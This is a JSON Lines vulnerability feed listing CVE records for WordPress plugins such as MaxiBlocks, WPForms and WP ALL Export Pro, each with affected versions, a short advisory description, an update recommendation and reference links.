{"CVE_ID":"CVE-2024-6885","slug":"maxi-blocks","versionImpact":"1.9.2","versionEndExcluding":"1.9.3","description":"The MaxiBlocks: 2200+ Patterns, 190 Pages, 14.2K Icons & 100 Styles plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the maxi_remove_custom_image_size and maxi_add_custom_image_size functions in all versions up to, and including, 1.9.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 1.9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/249b08c5-7429-4690-9f08-fc3f049aa62c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/249b08c5-7429-4690-9f08-fc3f049aa62c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maxi-blocks\\\/tags\\\/1.9.2\\\/core\\\/class-maxi-image-crop.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maxi-blocks\\\/tags\\\/1.9.2\\\/core\\\/class-maxi-image-crop.php#L42\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maxi-blocks\\\/tags\\\/1.9.2\\\/core\\\/class-maxi-image-crop.php#L100\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maxi-blocks\\\/tags\\\/1.9.2\\\/core\\\/class-maxi-image-crop.php#L100\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maxi-blocks\\\/tags\\\/1.9.2\\\/plugin.php#L221\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maxi-blocks\\\/tags\\\/1.9.2\\\/plugin.php#L221\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10647","slug":"ws-form","versionImpact":"1.9.244","versionEndExcluding":"1.9.245","description":"The WS Form LITE \u2013 Drag & Drop Contact Form Builder for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.9.244. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.9.245, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6cab527f-bd67-4b67-8133-f085098d63dc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6cab527f-bd67-4b67-8133-f085098d63dc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3179725\\\/ws-form\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3179725\\\/ws-form\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1505","slug":"academy","versionImpact":"1.9.19","versionEndExcluding":"1.9.20","description":"The Academy LMS \u2013 eLearning and online course solution for WordPress plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.9.19. This is due to plugin allowing arbitrary user meta updates through the saved_user_info() function. This makes it possible for authenticated attackers, with minimal permissions such as students, to elevate their user role to that of an administrator.","recommendation":"Update to version 1.9.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b150f90a-ccb7-4c19-a4b3-eaf9ec264ba8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b150f90a-ccb7-4c19-a4b3-eaf9ec264ba8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3037880\\\/academy#file473\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3037880\\\/academy#file473\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11223","slug":"wpforms-lite","versionImpact":"1.9.2.2","versionEndExcluding":"1.9.2.3","description":"The WPForms  WordPress plugin before 1.9.2.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.9.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/82989909-9745-4c9a-abc7-c1adf8c2b047\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/82989909-9745-4c9a-abc7-c1adf8c2b047\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10796","slug":"if-so","versionImpact":"1.9.2.1","versionEndExcluding":"1.9.2.2","description":"The If-So Dynamic Content Personalization plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.9.2.1 via the 'ifso-show-post' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created via Elementor that they should not have access to.","recommendation":"Update to version 1.9.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188093\\\/if-so\\\/trunk\\\/extensions\\\/ifso-extended-shortcodes\\\/extended-shortcodes.php?old=3157276&old_path=if-so%2Ftrunk%2Fextensions%2Fifso-extended-shortcodes%2Fextended-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188093\\\/if-so\\\/trunk\\\/extensions\\\/ifso-extended-shortcodes\\\/extended-shortcodes.php?old=3157276&old_path=if-so%2Ftrunk%2Fextensions%2Fifso-extended-shortcodes%2Fextended-shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66363035-c09f-4b41-b9fe-2e2bdd851f41?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66363035-c09f-4b41-b9fe-2e2bdd851f41?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11205","slug":"wpforms-lite","versionImpact":"1.9.2.1","versionEndExcluding":"1.9.2.2","description":"The WPForms plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wpforms_is_admin_page' function in versions starting from 1.8.4 up to, and including, 1.9.2.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to refund payments and cancel subscriptions.","recommendation":"Update to version 1.9.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforms-lite\\\/tags\\\/1.9.2.1\\\/includes\\\/functions\\\/checks.php#L191\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforms-lite\\\/tags\\\/1.9.2.1\\\/includes\\\/functions\\\/checks.php#L191\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforms-lite\\\/tags\\\/1.9.2.1\\\/src\\\/Integrations\\\/Stripe\\\/Admin\\\/Payments\\\/SingleActionsHandler.php#L148\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforms-lite\\\/tags\\\/1.9.2.1\\\/src\\\/Integrations\\\/Stripe\\\/Admin\\\/Payments\\\/SingleActionsHandler.php#L148\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforms-lite\\\/tags\\\/1.9.2.1\\\/src\\\/Integrations\\\/Stripe\\\/Admin\\\/Payments\\\/SingleActionsHandler.php#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforms-lite\\\/tags\\\/1.9.2.1\\\/src\\\/Integrations\\\/Stripe\\\/Admin\\\/Payments\\\/SingleActionsHandler.php#L92\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191229\\\/wpforms-lite#file2128\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191229\\\/wpforms-lite#file2128\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66898509-a93c-4dc3-bf01-1743daaa0ff1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66898509-a93c-4dc3-bf01-1743daaa0ff1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10593","slug":"wpforms-lite","versionImpact":"1.9.1.6","versionEndExcluding":"1.9.2.1","description":"The WPForms \u2013 Easy Form Builder for WordPress \u2013 Contact Forms, Payment Forms, Surveys, & More plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.9.1.6. This is due to missing or incorrect nonce validation on the process_admin_ui function. This makes it possible for unauthenticated attackers to delete WPForm logs via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.9.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d1ea80a-a1ce-4964-8dde-f3ed2df5537c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d1ea80a-a1ce-4964-8dde-f3ed2df5537c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforms-lite\\\/tags\\\/1.9.1.6\\\/src\\\/Admin\\\/Tools\\\/Views\\\/Logs.php#L269\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforms-lite\\\/tags\\\/1.9.1.6\\\/src\\\/Admin\\\/Tools\\\/Views\\\/Logs.php#L269\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforms-lite\\\/tags\\\/1.9.1.6\\\/src\\\/Logger\\\/ListTable.php#L394\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforms-lite\\\/tags\\\/1.9.1.6\\\/src\\\/Logger\\\/ListTable.php#L394\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6252","slug":"qi-addons-for-elementor","versionImpact":"1.9.1","versionEndExcluding":"1.9.2","description":"The Qi Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in all versions up to, and including, 1.9.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qi-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/main.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qi-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/main.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3318746%40qi-addons-for-elementor%2Ftrunk&old=3308494%40qi-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3318746%40qi-addons-for-elementor%2Ftrunk&old=3308494%40qi-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ef82a52-0a32-4dc4-b027-3d2098549404?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ef82a52-0a32-4dc4-b027-3d2098549404?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4261","slug":"lead-form-builder","versionImpact":"1.9.1","versionEndExcluding":"1.9.2","description":"The Responsive Contact Form Builder & Lead Generation Plugin plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.9.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with subscriber-level access and above, to execute arbitrary shortcodes.","recommendation":"Update to version 1.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/858d8641-7455-47c2-9639-480ce4ec3540?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/858d8641-7455-47c2-9639-480ce4ec3540?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-form-builder\\\/trunk\\\/block\\\/app.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-form-builder\\\/trunk\\\/block\\\/app.php#L24\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9232","slug":"download-plugins-dashboard","versionImpact":"1.9.1","versionEndExcluding":"1.9.2","description":"The Download Plugins and Themes in ZIP from Dashboard plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.9.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3ea04ba-b609-49cd-aae8-68f5b51df154?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3ea04ba-b609-49cd-aae8-68f5b51df154?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-plugins-dashboard\\\/tags\\\/1.9.1\\\/includes\\\/settings\\\/class-alg-download-plugins-settings.php#L336\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-plugins-dashboard\\\/tags\\\/1.9.1\\\/includes\\\/settings\\\/class-alg-download-plugins-settings.php#L336\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165289\\\/#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165289\\\/#file5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7425","slug":"wp-all-export-pro","versionImpact":"1.9.1","versionEndExcluding":"1.9.2","description":"The WP ALL Export Pro plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to improper user input validation and sanitization in all versions up to, and including, 1.9.1. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"Update to version 1.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9205896-487d-4b8f-84cf-7ba16e1205e3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9205896-487d-4b8f-84cf-7ba16e1205e3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpallimport.com\\\/upgrade-to-wp-all-export-pro\\\/\",\"name\":\"https:\\\/\\\/www.wpallimport.com\\\/upgrade-to-wp-all-export-pro\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7419","slug":"wp-all-export-pro","versionImpact":"1.9.1","versionEndExcluding":"1.9.2","description":"The WP ALL Export Pro plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.9.1 via the custom export fields. This is due to the missing input validation and sanitization of user-supplied data. This makes it possible for unauthenticated attackers to inject arbitrary PHP code into form fields that get executed on the server during the export, potentially leading to a complete site compromise. \r\nAs a prerequisite, the custom export field should include fields containing user-supplied data.","recommendation":"Update to version 1.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40b57370-4fd7-4316-9e99-a3f1d34616e8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40b57370-4fd7-4316-9e99-a3f1d34616e8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpallimport.com\\\/upgrade-to-wp-all-export-pro\\\/\",\"name\":\"https:\\\/\\\/www.wpallimport.com\\\/upgrade-to-wp-all-export-pro\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10866","slug":"export-import-menus","versionImpact":"1.9.1","versionEndExcluding":"1.9.2","description":"The Export Import Menus plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the dsp_export_import_menus() function in all versions up to, and including, 1.9.1. This makes it possible for unauthenticated attackers to export menu data and settings.","recommendation":"Update to version 1.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3213801%40export-import-menus&new=3213801%40export-import-menus&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3213801%40export-import-menus&new=3213801%40export-import-menus&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08beb583-096d-453c-9690-b46e410afb1b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08beb583-096d-453c-9690-b46e410afb1b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-24588","slug":"patreon-connect","versionImpact":"1.9.1","versionEndExcluding":"1.9.2","description":"Missing Authorization vulnerability in Patreon Patreon WordPress allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Patreon WordPress: from n\/a through 1.9.1.","recommendation":"Update to version 1.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/patreon-connect\\\/vulnerability\\\/wordpress-patreon-wordpress-plugin-1-9-1-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/patreon-connect\\\/vulnerability\\\/wordpress-patreon-wordpress-plugin-1-9-1-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-52135","slug":"ws-form","versionEndExcluding":"1.9.171","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WS Form WS Form LITE \u2013 Drag & Drop Contact Form Builder for WordPress.This issue affects WS Form LITE \u2013 Drag & Drop Contact Form Builder for WordPress: from n\/a through 1.9.170.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ws-form\\\/wordpress-ws-form-lite-drag-drop-contact-form-builder-for-wordpress-plugin-1-9-170-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ws-form\\\/wordpress-ws-form-lite-drag-drop-contact-form-builder-for-wordpress-plugin-1-9-170-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6289","slug":"wps-hide-login","versionImpact":"1.9.16.3","versionEndExcluding":"1.9.16.4","description":"The WPS Hide Login WordPress plugin before 1.9.16.4 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.","recommendation":"Update to version 1.9.16.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fd6d0362-df1d-4416-b8b5-6e5d0ce84793\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fd6d0362-df1d-4416-b8b5-6e5d0ce84793\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2473","slug":"wps-hide-login","versionImpact":"1.9.15.2","versionEndExcluding":"1.9.16","description":"The WPS Hide Login plugin for WordPress is vulnerable to Login Page Disclosure in all versions up to, and including, 1.9.15.2. This is due to a bypass that is created when the 'action=postpass' parameter is supplied. This makes it possible for attackers to easily discover any login page that may have been hidden by the plugin.","recommendation":"Update to version 1.9.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd21c7d3-a5f1-4c3a-b6ab-0a979f070a62?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd21c7d3-a5f1-4c3a-b6ab-0a979f070a62?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099109\\\/wps-hide-login\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099109\\\/wps-hide-login\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10543","slug":"tumult-hype-animations","versionImpact":"1.9.14","versionEndExcluding":"1.9.15","description":"The Tumult Hype Animations plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the hypeanimations_getcontent function in all versions up to, and including, 1.9.14. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve animation information.","recommendation":"Update to version 1.9.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7273526e-bb51-418f-9ac8-8832f2de1cd6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7273526e-bb51-418f-9ac8-8832f2de1cd6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3182537%40tumult-hype-animations&new=3182537%40tumult-hype-animations&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3182537%40tumult-hype-animations&new=3182537%40tumult-hype-animations&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9582","slug":"accordion-slider","versionImpact":"1.9.11","versionEndExcluding":"1.9.12","description":"The Accordion Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018html\u2019 attribute of an accordion slider in all versions up to, and including, 1.9.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: Successful exploitation by Contributor-level users requires an Administrator-level user to provide access to the plugin's admin area via the `Access` plugin setting, which is restricted to administrators by default.","recommendation":"Update to version 1.9.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94f19f56-0667-443e-8545-a17fbe9c3ddb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94f19f56-0667-443e-8545-a17fbe9c3ddb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3166480\\\/accordion-slider\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3166480\\\/accordion-slider\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4324","slug":"wp-video-lightbox","versionImpact":"1.9.10","versionEndExcluding":"1.9.11","description":"The WP Video Lightbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018width\u2019 parameter in all versions up to, and including, 1.9.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.9.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da2d8494-aea3-4a1e-9eca-946c0bd390cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da2d8494-aea3-4a1e-9eca-946c0bd390cd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-video-lightbox\\\/trunk\\\/misc_functions.php#L60\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-video-lightbox\\\/trunk\\\/misc_functions.php#L60\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5998","slug":"password-protect-page","versionImpact":"1.9.10","versionEndExcluding":"1.9.11","description":"The PPWP \u2013 Password Protect Pages WordPress plugin before version 1.9.11 allows to put the site content behind a password authorization, however users with subscriber or greater roles can view content via the REST API.","recommendation":"Update to version 1.9.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17bad181-6cea-445e-b91c-22415d90743e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17bad181-6cea-445e-b91c-22415d90743e\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17bad181-6cea-445e-b91c-22415d90743e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17bad181-6cea-445e-b91c-22415d90743e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7056","slug":"wpforms-lite","versionImpact":"1.9.1.5","versionEndExcluding":"1.9.1.6","description":"The WPForms  WordPress plugin before 1.9.1.6 does not sanitise and escape some of its settings, which could allow high privilege users such as Admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.9.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/467af13e-25bd-425c-929d-5dd06e28d595\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/467af13e-25bd-425c-929d-5dd06e28d595\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4436","slug":"3dprint-lite","versionEndExcluding":"1.9.1.5","description":"The 3DPrint Lite WordPress plugin before 1.9.1.5 does not have any authorisation and does not check the uploaded file in its p3dlite_handle_upload AJAX action , allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache.","recommendation":"Update to version 1.9.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c46ecd0d-a132-4ad6-b936-8acde3a09282\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c46ecd0d-a132-4ad6-b936-8acde3a09282\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3692","slug":"gutenverse","versionImpact":"1.9.0","versionEndExcluding":"1.9.1","description":"The Gutenverse  WordPress plugin before 1.9.1 does not validate the htmlTag option in various of its block before outputting it back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 1.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6f100f85-3a76-44be-8092-06eb8595b0c9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6f100f85-3a76-44be-8092-06eb8595b0c9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
